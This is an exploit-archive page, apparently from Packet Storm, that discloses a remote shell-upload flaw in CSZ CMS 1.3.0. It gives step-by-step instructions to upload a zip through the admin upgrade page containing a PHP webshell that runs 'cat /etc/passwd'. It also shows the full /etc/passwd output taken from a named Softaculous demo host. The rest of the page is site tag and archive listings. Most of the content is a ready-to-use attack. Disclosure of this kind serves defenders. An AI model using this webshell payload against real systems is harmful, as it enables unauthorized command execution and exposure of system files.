CSZ CMS 1.3.0 Shell Upload

CSZ CMS 1.3.0 Shell Upload

Posted Nov 25, 2023

Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote shell upload vulnerability.

tags | exploit, remote, shell

SHA-256 | b8f0f3c59686781c297f072ed9c3ca2896c1c6ea8f3916447a7e73c9086eb19a

Download | Favorite | View

CSZ CMS 1.3.0 Shell Upload

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution# Date: 23/11/2023# Exploit Author: tmrswrr# Vendor Homepage: https://www.cszcms.com/# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download# Version: Version 1.3.0# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS1 ) Enter admin panel and go to this url > https://demos1.softaculous.com/CSZ_CMSqwoqwrdkog/admin/upgrade2 ) System Upgrade Manually  and upload this test.zip file :<?php echo system('cat /etc/passwd'); ?>3 ) https://demos1.softaculous.com/CSZ_CMSstym1wtmnz/test.phproot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin systemd-bus-proxy:x:999:998:systemd Bus Proxy:/:/sbin/nologin systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin polkitd:x:998:997:User for polkitd:/:/sbin/nologin tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin chrony:x:997:995::/var/lib/chrony:/sbin/nologin soft:x:1000:1000::/home/soft:/sbin/nologin saslauth:x:996:76:Saslauthd user:/run/saslauthd:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin emps:x:995:1001::/home/emps:/bin/bash named:x:25:25:Named:/var/named:/sbin/nologin exim:x:93:93::/var/spool/exim:/sbin/nologin vmail:x:5000:5000::/var/local/vmail:/bin/bash webuzo:x:992:991::/home/webuzo:/bin/bash apache:x:991:990::/home/apache:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/false

File Tags

• ActiveX (932)
• Advisory (83,267)
• Arbitrary (16,401)
• BBS (2,859)
• Bypass (1,803)
• CGI (1,029)
• Code Execution (7,417)
• Conference (682)
• Cracker (843)
• CSRF (3,353)
• DoS (23,990)
• Encryption (2,372)
• Exploit (52,241)
• File Inclusion (4,233)
• File Upload (977)
• Firewall (822)
• Info Disclosure (2,807)
• Intrusion Detection (900)
• Java (3,091)
• JavaScript (879)
• Kernel (6,834)
• Local (14,569)
• Magazine (586)
• Overflow (12,849)
• Perl (1,426)
• PHP (5,162)
• Proof of Concept (2,349)
• Protocol (3,652)
• Python (1,566)
• Remote (31,026)
• Root (3,605)
• Rootkit (515)
• Ruby (614)
• Scanner (1,645)
• Security Tool (7,926)
• Shell (3,209)
• Shellcode (1,216)
• Sniffer (897)
• Spoof (2,229)
• SQL Injection (16,436)
• TCP (2,419)
• Trojan (687)
• UDP (896)
• Virus (667)
• Vulnerability (32,079)
• Web (9,786)
• Whitepaper (3,757)
• x86 (966)
• XSS (18,042)
• Other

File Archives

• November 2023
• October 2023
• September 2023
• August 2023
• July 2023
• June 2023
• May 2023
• April 2023
• March 2023
• February 2023
• January 2023
• December 2022
• Older

Systems

• AIX (429)
• Apple (2,037)
• BSD (375)
• CentOS (57)
• Cisco (1,926)
• Debian (6,907)
• Fedora (1,692)
• FreeBSD (1,246)
• Gentoo (4,375)
• HPUX (880)
• iOS (363)
• iPhone (108)
• IRIX (220)
• Juniper (69)
• Linux (47,744)
• Mac OS X (691)
• Mandriva (3,105)
• NetBSD (256)
• OpenBSD (486)
• RedHat (14,557)
• Slackware (941)
• Solaris (1,611)
• SUSE (1,444)
• Ubuntu (9,110)
• UNIX (9,338)
• UnixWare (187)
• Windows (6,605)
• Other